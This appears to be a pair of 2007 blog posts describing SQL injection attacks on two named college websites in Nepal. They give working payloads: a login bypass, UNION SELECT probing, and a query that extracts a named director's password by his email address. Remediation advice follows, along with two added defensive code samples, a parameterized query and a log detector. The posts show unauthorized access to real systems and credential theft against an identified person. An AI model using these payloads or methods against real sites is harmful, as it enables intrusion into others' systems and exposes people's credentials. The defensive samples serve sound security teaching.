
Saturday, September 29, 2007

Kathmandu School of Law website (ksl.edu.np) vulnerable to SQL injection (minor hack)

Please do not take this posting as an offense against your website. Our motive is to let you know about the insecurities in your website and also to give options to improve them.

Thanks go to laex8pearl for finding the loophole and pointing out the website.

Information
The mission page of Kathmandu School of Law states that "It is an emerging legal institution pioneering in the field of imparting quality education and is dedicated to maintain high standards of academic excellence. Its prime objective is to address the need of an academically sound and practically feasible legal education in Nepal."

Level of vulnerability
7/10, since we can extract passwords ^__^

Review of Kathmandu School Of Law Website
Most of the pages are written in ASP. The front pages are not very interesting from a security standpoint, since they only carry general content. The interesting part is the articles section, which has dynamic content and dynamic URLs.

The login page is at http://www.ksl.edu.np/login.asp

SQL Injection In Detail
It starts with testing whether inputs are escaped or not; in this website they are not.
In the login page, enter ' or ' in both the username and password fields and we're inside. :-) Pretty simple. There is nothing interesting inside though: we can post articles but not edit them, nothing interesting at all.

To see which database they are using, enter ' garbage in both the username and password fields; a simple error appears, as expected. In the case of ksl.edu.np we get this output:

Microsoft OLE DB Provider for ODBC Drivers error '80040e14'
[Microsoft][ODBC Microsoft Access Driver]
Syntax error (missing operator) in query expression 'email='' garbage' and password='' garbage''.
/login_validate.asp, line 25

OK, so the Access driver, not even a database server. Hmm, a small site; can't expect much.

The real fun comes now. In the login screen we are asked to enter an email address and a password, so let's find some already existing users.

In the articles section a couple of users are listed; let's see if we can find more info on at least one of them.

OK, got it, here is one:

Nice, it seems he is the director of KSL. Lucky me, let's find his password :-D

For this we will use the article display page. Take a look at the URL of an article page. It is in the format http://www.ksl.edu.np/view_article.asp?id=24; different articles have different ids.

Let's test it to get some more results: http://www.ksl.edu.np/view_article.asp?id=24 or id=23 yields a different article. Hmm, it seems there is an order by id clause at the end, i.e., the ASP page displays the article with the lowest id.

Interesting!!! Let's add our own article with id=1, the minimum. How do we achieve that? With a SQL UNION SELECT.

First we need the name of the table; an easy guess, article, works!!! Yeah!!!
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,1 from article

It gives an error saying this:

Microsoft OLE DB Provider for ODBC Drivers error '80004005'

[Microsoft][ODBC Microsoft Access Driver] The number of columns in the two selected tables or queries of a union query do not match.

/view_article.asp, line 56

The interesting thing is that UNION SELECT works but the number of columns does not match. Trial and error led me to 8 columns, i.e. this URL works: http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,6,7,8 from article

Great, the title is in the 5th column and the body in the 6th. What next? Let's see if we can find the password of an existing user; that should be pretty simple, huh??

First we need to guess the name of the table containing the passwords; the most probable guesses are accounts, users, members, ... in singular and plural forms. Lucky me, it's member.

So how do we see the password?? Open this URL:
http://www.ksl.edu.np/view_article.asp?id=24 union select 1,2,3,4,5,(select password from member where email='sangroula@wlink.com.np'),7,8 from article



WORKS GREAT!!! Finally, a password.

How to remove the SQL injection in the Kathmandu School of Law website (ksl.edu.np)? It's really, really simple:
Rule number 1: never trust the users; always sanitize everything you take as input and everything you output.
Rule number 2: never display SQL errors; hide them or redirect to a page-not-found page.
Rule number 3: use a framework like Drupal, Mambo or Joomla, because these frameworks include the community effort of thousands of people and they are really secure.
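As an added example (not code from the original post or from ksl.edu.np), here is the query shape the login error above reveals, built by string concatenation, beside a version that binds the values as parameters and hides database errors, which is what rules 1 and 2 amount to in practice. sqlite3 stands in for the Access database; the member table and its email/password columns come from the post, and the sample account is constructed.

```python
import sqlite3

# Constructed stand-in for the "member" table the post names (sqlite instead
# of Access, but the concatenation bug is identical with any driver).
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE member (email TEXT, password TEXT)")
    # Cleartext only to mirror the post; a real site stores a salted hash.
    conn.execute("INSERT INTO member VALUES ('user@example.invalid', 's3cret')")
    return conn

def build_vulnerable_sql(email, password):
    # The shape login_validate.asp reveals in its error message: user input is
    # pasted straight into the SQL text, so a single quote ends the literal.
    return "SELECT email FROM member WHERE email='%s' and password='%s'" % (email, password)

def login_vulnerable(conn, email, password):
    try:
        row = conn.execute(build_vulnerable_sql(email, password)).fetchone()
    except sqlite3.OperationalError as exc:
        # This is the kind of text that leaked to the browser as ODBC error 80040e14.
        return "db error: %s" % exc
    return row is not None

def login_hardened(conn, email, password):
    # Rule 1: bind the values; the driver sends them as data, never as SQL.
    # Rule 2: a database error becomes a plain "login failed"; the detail goes
    # to the server log, never into the response.
    try:
        row = conn.execute(
            "SELECT email FROM member WHERE email=? AND password=?",
            (email, password),
        ).fetchone()
    except sqlite3.Error as exc:
        print("login_validate: db error (logged, not shown to the user):", exc)
        return False
    return row is not None

if __name__ == "__main__":
    db = make_db()
    print(login_vulnerable(db, "' garbage", "' garbage"))  # leaks a syntax error
    print(login_hardened(db, "' garbage", "' garbage"))    # False, quietly
```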

The admin of http://www.ksl.edu.np has been emailed about this.
So don't be surprised if this doesn't work.

Tuesday, September 18, 2007

Kantipur Engineering College website Vulnerability to SQL Injection (minor hack)

Please do not take this posting as an offense against your website. Our motive is to let you know about the insecurities in your website and also to give options to improve them.

Kantipur Engineering College is one of the well-known colleges of KTM. It provides undergraduate studies for the Bachelor of Engineering in Computer Science, Electronics Engineering and other faculties.
Please see their website at http://www.kec.edu.np.

Level of vulnerability 1/5
SQL Injection in detail

Most of the pages seem to be static, with no URL parameters to modify or fiddle with.
The only place to tinker with is the news section, which is shown in a small column on the right.

The URL is http://www.kec.edu.np/news.php?id=5. This is very lucrative, since it is so common to just change the id and see what output results.

At id=5 we get:


To inject some simple SQL we just change the 5 into some text, say "asdf", and you get
Unknown column 'asdf' in 'where clause'
This shows that the query is something like
select * from where id=variablename
and the above error is exactly what you get when you insert a bare string in place of variablename.

What about
http://www.kec.edu.np/news.php?id=news_id
or
http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title desc


Hmm, it seems that it executes OK with no error, so we know one of the column names of the table.
Finally, with a simple guess, the table should be named news, so doing a simple
http://www.kec.edu.np/news.php?id=news.news_id
gives us all the rows in the news table.

These are the fields of the news table: news_id, news_title, news_date, which we can see by successfully executing this line:

http://www.kec.edu.np/news.php?id=1 OR 1=1 or news.news_id=1 order by news.news_title, news.news_date desc


Also, we can do a UNION SELECT, which opens up a lot of possibilities. But I bet they don't have anything interesting. The homepage already has nbsp all around the top links; very bad web design.
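As an added example covering the probing steps of both posts (not code from the original posts or from either college), here is a small detector that URL-decodes the query string of each access-log request and flags the patterns walked through above: a quote inside a parameter, an OR 1=1 tautology, UNION SELECT, ORDER BY column probing, and a non-numeric id value. The log lines are constructed to mirror the URLs in the posts, and the client addresses are documentation-range placeholders.

```python
import re
from urllib.parse import unquote_plus

# One rule per probing technique the posts describe, matched against the
# URL-decoded query string. Order of the dict is the order names are reported.
RULES = {
    "quote_in_param": re.compile(r"=[^&]*'"),                       # ' garbage, ' or '
    "tautology": re.compile(r"\bor\s+\d+\s*=\s*\d+", re.I),         # OR 1=1
    "union_select": re.compile(r"\bunion\b.*\bselect\b", re.I),     # union select 1,2,...
    "order_by_probe": re.compile(r"\border\s+by\b", re.I),          # order by news.news_title
    "nonnumeric_id": re.compile(r"(^|&)id=(?!\d+(?:&|$))"),         # id=asdf, id=news.news_id
}

# Constructed common-log-format lines; paths mirror the URLs in the two posts.
SAMPLE_LOG = """\
203.0.113.5 - - [29/Sep/2007:10:01:02 +0545] "GET /view_article.asp?id=24 HTTP/1.1" 200 5120
203.0.113.5 - - [29/Sep/2007:10:01:40 +0545] "GET /view_article.asp?id=24%20union%20select%201,2,3,4,5,6,7,8%20from%20article HTTP/1.1" 200 5188
198.51.100.9 - - [18/Sep/2007:09:30:11 +0545] "GET /news.php?id=1%20OR%201=1%20or%20news.news_id=1%20order%20by%20news.news_title%20desc HTTP/1.1" 200 2210
198.51.100.9 - - [18/Sep/2007:09:31:00 +0545] "GET /news.php?id=asdf HTTP/1.1" 200 980
198.51.100.9 - - [18/Sep/2007:09:31:30 +0545] "GET /news.php?id=5%27 HTTP/1.1" 500 312
"""

LINE_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(?:GET|POST) (\S+) HTTP/[\d.]+" (\d{3})')

def scan_log(text):
    """Return (client, path, [rule names]) for every request matching a rule."""
    hits = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue  # not a request line we understand; skip rather than guess
        client, _ts, raw_path, _status = m.groups()
        # Decode first: the probes arrive percent-encoded, the rules expect plain text.
        path, _, query = unquote_plus(raw_path).partition("?")
        matched = [name for name, rx in RULES.items() if rx.search(query)]
        if matched:
            hits.append((client, path, matched))
    return hits

if __name__ == "__main__":
    for client, path, names in scan_log(SAMPLE_LOG):
        print(client, path, ",".join(names))
```

The id=24 request produces no hit, so a plain article view is not flagged; everything after it in the sample is.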

How to remove the SQL injection??
The techniques are widely discussed on various websites.
  • This is a very helpful link on how to prevent SQL injections:
    http://www.unixwiz.net/techtips/sql-injection.html#miti
  • It's a bad idea to create a website from scratch, because there will be lots of places we would most probably overlook. SQL injection is just one of the many loopholes hackers use to get into our website.
Comments are more than welcome. We hope this helped the original author of the website fix its flaws.

The admin of http://www.kec.edu.np has been emailed about this.
So don't be surprised if this doesn't work.

Update
The mentioned email address admin@kec.wlink.com.np bounced with a delivery failure, :-| so even their official email does not work. Somebody please inform the college web admins.